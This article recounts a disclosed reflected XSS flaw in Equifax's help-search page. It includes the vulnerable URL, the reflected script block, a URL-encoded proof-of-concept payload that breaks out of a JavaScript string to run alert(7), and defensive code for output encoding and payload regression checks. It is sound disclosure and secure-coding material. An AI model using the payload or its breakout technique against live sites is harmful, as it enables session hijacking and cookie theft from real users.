In December 2022, a security researcher reported a reflected cross-site scripting (XSS) vulnerability affecting the search functionality on the Equifax website. The issue was submitted through the company’s vulnerability disclosure program on HackerOne.
Vulnerability Description
The vulnerable endpoint was:
https://www.equifax.com/personal/help/search?search=<input>
When a user entered a search term, the application reflected that value directly into a JavaScript function on the returned page. For example, the word broook appeared in the following script block:
<script type="text/javascript">
window.onload = function(e){
Analytics.trackEvent('emptySearch',{internalSearchTerm: "broook" , numOfSearchResultsReturned: 0});
}
</script>
Because the search parameter was reflected into a JavaScript string literal without being escaped for that context, an attacker could close the string and inject arbitrary JavaScript code.
Proof of Concept
The researcher supplied a payload that modified the parameters of the Analytics.trackEvent function:
%22%20%2C%20internalSearchTerm%3A%20%5B7%5D.map%28alert%29%20%2C%20numOfSearchResultsReturned%3A%20%22b
When decoded, this payload injected an array mapping function that executed alert(7). The final vulnerable script looked like this:
<script type="text/javascript">
window.onload = function(e){
Analytics.trackEvent('SEARCHRETURNED',{internalSearchTerm: "" , internalSearchTerm: [7].map(alert) , numOfSearchResultsReturned: "b" , numOfSearchResultsReturned: 167});
}
</script>
This confirmed that the input was being executed as JavaScript in the browser.
Impact
A successful exploit would allow an attacker to execute arbitrary JavaScript in the context of a victim’s browser session. This could lead to theft of cookies, session hijacking, or other malicious actions depending on the attacker’s goals.
Conclusion
This case highlights the risks of directly embedding user-controlled input into JavaScript code without proper sanitization or encoding. Reflected XSS vulnerabilities are still common and can have serious consequences when exploited on high-profile sites. Proper input handling and output encoding remain essential defenses.
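To make the output-encoding point concrete, the following is an added example written for this article; it is not Equifax's code, and the render functions, the encodeForJs helper and the literalIsIntact check are assumptions about how such a page might be generated. It renders the same Analytics.trackEvent call two ways: interpolating the raw search term (the pattern described above) and interpolating a properly escaped JavaScript string literal. The check then confirms that the page's own URL-encoded payload breaks out of the string in the first rendering but stays inert in the second.

```javascript
// Added example (not from the original report or from Equifax).
// Renders the search-analytics script line the way a vulnerable template would:
// the raw term is dropped straight into a JS string literal.
function renderVulnerable(term) {
  return `Analytics.trackEvent('emptySearch',{internalSearchTerm: "${term}" , numOfSearchResultsReturned: 0});`;
}

// Encode a value for use inside a <script> block as a JS string literal.
// JSON.stringify yields a valid literal with quotes, backslashes and control
// characters escaped; the extra replacements stop the literal from containing
// "</script" (which would end the script element) or the U+2028/U+2029 line
// terminators that break inline JS in older parsers.
function encodeForJs(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Hardened rendering: the term can only ever be string data.
function renderSafe(term) {
  return `Analytics.trackEvent('emptySearch',{internalSearchTerm: ${encodeForJs(term)} , numOfSearchResultsReturned: 0});`;
}

// Defender-side check: pull the first internalSearchTerm string literal out of
// the rendered line and verify it round-trips to exactly the submitted term.
// If the term escaped the literal, the extracted value will not match.
function literalIsIntact(rendered, term) {
  const m = rendered.match(/internalSearchTerm: ("(?:[^"\\]|\\.)*")/);
  if (!m) return false;
  try {
    return JSON.parse(m[1]) === term;
  } catch (e) {
    return false;
  }
}

// The URL-encoded payload quoted in the report above (page value, not constructed).
const REPORTED_PAYLOAD =
  '%22%20%2C%20internalSearchTerm%3A%20%5B7%5D.map%28alert%29%20%2C%20numOfSearchResultsReturned%3A%20%22b';

function demo() {
  const term = decodeURIComponent(REPORTED_PAYLOAD);
  return {
    vulnerableIntact: literalIsIntact(renderVulnerable(term), term), // false: string was broken out of
    safeIntact: literalIsIntact(renderSafe(term), term),             // true: payload stays inert data
    safeBlocksScriptClose: !renderSafe('</script>').includes('</script>'),
  };
}

console.log(demo());
```

The key design choice is encoding for the exact context the value lands in: HTML-entity encoding would not help here, because the term sits inside a JavaScript string, not in HTML text. Applying encodeForJs at the point of output (or using a templating engine that does so automatically) is the fix the report implies; the literalIsIntact check is the kind of assertion a regression test for this endpoint could carry.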